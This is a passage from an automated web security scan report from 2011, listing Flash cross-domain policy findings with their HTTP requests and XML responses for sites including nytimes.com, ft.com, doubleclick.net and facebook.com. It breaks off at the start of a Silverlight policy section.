Request

GET /crossdomain.xml HTTP/1.0
Host: engine.cmmeglobal.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"208-1304684854000"
Last-Modified: Fri, 06 May 2011 12:27:34 GMT
Content-Type: application/xml
Content-Length: 208
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443,8080"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain
...[SNIP]...

5.9. http://feeds.feedburner.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://feeds.feedburner.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.feedburner.com

Response

HTTP/1.0 200 OK
Expires: Fri, 13 May 2011 10:57:47 GMT
Date: Thu, 12 May 2011 10:57:47 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.10. http://js.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 11:03:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.11. http://pix04.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 11:03:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.12. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:08 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 19 May 2011 11:04:08 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

5.13. http://wt.o.nytimes.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wt.o.nytimes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: wt.o.nytimes.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:82c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:04:37 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.14. http://add.my.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://add.my.yahoo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 10:57:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.15. http://dealbook.nytimes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://dealbook.nytimes.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: dealbook.nytimes.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:54 GMT
Server: Apache
Last-Modified: Wed, 11 May 2011 17:05:31 GMT
ETag: "100a4d-169-4a303147fecc0"
Accept-Ranges: bytes
Content-Length: 361
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
...[SNIP]...

5.16. http://googleads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 10:43:52 GMT
Expires: Fri, 13 May 2011 10:43:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 1120

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.17. http://graphics8.nytimes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://graphics8.nytimes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: graphics8.nytimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 1169
Content-Type: text/xml
Last-Modified: Wed, 21 Jul 2010 15:01:34 GMT
ETag: "491-4c470bce"
Cache-Control: private, max-age=63703
Date: Thu, 12 May 2011 11:02:58 GMT
Content-Length: 1169
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

5.18. http://markets.on.nytimes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://markets.on.nytimes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: markets.on.nytimes.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:03:52 GMT
Content-Length: 420
Content-Type: text/xml
Last-Modified: Mon, 14 Jul 2008 23:38:14 GMT
Accept-Ranges: bytes
ETag: "b87378afae6c81:3916"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
...[SNIP]...

5.19. http://media.ft.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.ft.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.ft.com

Response

HTTP/1.1 200 OK
Content-Length: 1309
Content-Type: text/xml
ETag: "51d-4ba8ec18"
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Accept-Ranges: bytes
Server: Apache/1.3.37
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Date: Thu, 12 May 2011 11:03:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

5.20. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Wed, 11 May 2011 19:28:23 GMT
Expires: Thu, 12 May 2011 19:28:23 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 55985

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.21. http://pubads.g.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 03:46:12 GMT
Expires: Fri, 13 May 2011 03:46:12 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26114
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

5.22. http://timespeople.nytimes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://timespeople.nytimes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: timespeople.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:16 GMT
Content-length: 464
Content-type: text/xml
Last-modified: Wed, 10 Mar 2010 02:18:30 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.*.tremormedia.com" />
   <allow-access-from domain="*.tremormedia.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

5.23. http://www.facebook.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.204.51
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

5.24. http://www.ft.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ft.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 12 May 2011 11:03:00 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

5.25. http://www.nytimes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.nytimes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nytimes.com

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Thu, 12 May 2011 11:03:02 GMT
Content-length: 1169
Content-type: text/xml
Set-cookie: RMID=2dff06a3406f4dcbbe6702e2; expires=Friday, 11-May-2012 11:03:03 GMT; path=/; domain=.nytimes.com
Last-modified: Wed, 21 Jul 2010 15:01:34 GMT
Accept-ranges: bytes
Connection: keep-alive

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="*.chumby.com" />
   <allow-access-from domain="*.createthe.com" />
   <allow-access-from domain="*.predictify.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.*.brightcove.com" />
   <allow-access-from domain="*.nytsyndicate.com"/>
   <allow-access-from domain="*.*.nytsyndicate.com"/>
   <allow-access-from domain="xdce.adobe.com" />
   <allow-access-from domain="www.rokkandev.com" />
   <allow-access-from domain="cdn.eyewonder.com" />
   <allow-access-from domain="apps.eyewonderlabs.com" />
   <allow-access-from domain="media.pointroll.com" />
   <allow-access-from domain="speed.pointroll.com" />
<allow-access-from domain="u-sta.unicast.com"/>
<allow-access-from domain="creativeby1.unicast.com"/>
<allow-access-from domain="creativeby2.unicast.com"/>
<allow-access-from domain="picklegroup.com"/>
...[SNIP]...

5.26. http://pillsburylaw.app4.hubspot.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pillsburylaw.app4.hubspot.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pillsburylaw.app4.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:cb38"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:51 GMT
Connection: close
Set-Cookie: HUBSPOT95=521213100.0.0000; path=/

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

5.27. http://stats.ft.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.ft.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.ft.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 24 Nov 2005 11:41:30 GMT
ETag: "7681a8-12e-4064e1e280e80"
Accept-Ranges: bytes
Content-Length: 302
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.axappphealthcare.co.uk" />
<allow-access-from domain="www.axappphealthcarecampaign.co.uk" />
...[SNIP]...

6. Silverlight cross-domain policy previous next
There are 4 instances of this issue:

http://ad.doubleclick.net/clientaccesspolicy.xml
http://ad.us.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml

Issue background

